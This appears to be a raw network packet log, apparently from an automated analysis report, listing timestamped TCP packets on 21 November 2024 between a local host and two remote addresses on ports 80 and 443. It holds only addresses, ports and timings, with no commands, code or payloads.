                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.951967001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.952071905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.952124119 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.952969074 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.953031063 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.953078032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.953131914 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.954060078 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.954116106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.954195976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.954359055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.955197096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.955252886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.955379963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.955435991 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.956341028 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.956393003 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.956490040 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.956547022 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.957365990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.957423925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.957431078 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.957482100 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.958381891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.958436012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.958524942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.958570004 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.959534883 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.959589005 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.959636927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.959695101 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.959775925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.960208893 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.960246086 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.960560083 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.960604906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.960654020 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.960684061 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.960695028 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.960784912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.961661100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.961797953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.961850882 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.962841988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.962903976 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.963001966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.963107109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.963824987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.963887930 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.963987112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.964046001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.964936972 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.965002060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.965010881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.965049982 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.966058016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.966150045 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.966171980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.966224909 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.967264891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.967324018 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.967447996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.967499971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.968182087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.968238115 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.968286037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.968492031 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.969300032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.969361067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.969520092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.969593048 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.970391989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.970448971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.970463991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.970519066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.971513033 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.971571922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.971571922 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.971617937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.972573996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.972640991 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.972687960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.972740889 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.973639011 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.973695040 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.973720074 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.973845005 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.974740028 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.974803925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.974838972 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.974884987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.975843906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.975904942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.976062059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.976140976 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.976905107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.976973057 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.977010965 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.977224112 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.977998972 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.978059053 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.978095055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.978142977 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.979088068 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.979151011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.979195118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.979305029 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.980165005 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.980225086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.980269909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.980612993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.981298923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.981353998 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.981400013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.981450081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.982352018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.982403994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.982450008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.982503891 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.983436108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.983491898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.983544111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.983594894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.984513044 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.984565020 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.984635115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.984684944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.985678911 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.985735893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.985831976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.986197948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.986685038 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.986829996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.986890078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.987809896 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.987860918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.987910986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.987984896 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.988909960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.989001036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.989053965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.990103006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.990156889 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.990159035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.990217924 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.991053104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.991103888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.991177082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.991223097 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.992151022 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.992214918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.992227077 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.992273092 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.993253946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.993304014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.993411064 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.993624926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.994360924 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.994422913 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.994538069 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.994617939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.995419025 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.995475054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.995526075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.995583057 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.996503115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.996560097 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.996634007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.996686935 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.997615099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.997672081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.997725010 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.997786999 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.998681068 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.998744011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.998769045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.998924971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.999742031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.999803066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.000049114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.000104904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.001199007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.001359940 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.001396894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.001442909 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.001971006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.002026081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.002028942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.002080917 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.003134012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.003192902 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.003269911 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.003341913 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.004190922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.004211903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.004252911 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.004270077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.005600929 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.005616903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.005661011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.005677938 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.006283998 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.006335020 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.006423950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.006481886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.007395983 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.007654905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.055183887 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.055731058 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.055774927 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.056132078 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.056147099 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.154149055 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.155107975 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.155108929 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.155155897 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.155194044 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.160701990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.160783052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.160799980 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.160835028 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.161262035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.161278963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.161334038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.162280083 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.162350893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.162404060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.162461042 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.163398981 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.163461924 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.163476944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.163508892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.164448023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.164519072 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.164545059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.164602995 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.165601015 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.165663958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.165693998 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.165744066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.166754007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.166802883 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.166872978 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.166912079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.167700052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.167756081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.167824984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.167896986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.168874025 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.168936968 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.169069052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.169121027 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.169907093 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.169958115 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.170006037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.170056105 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.171030998 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.171088934 CET4977080192.168.2.431.41.244.11
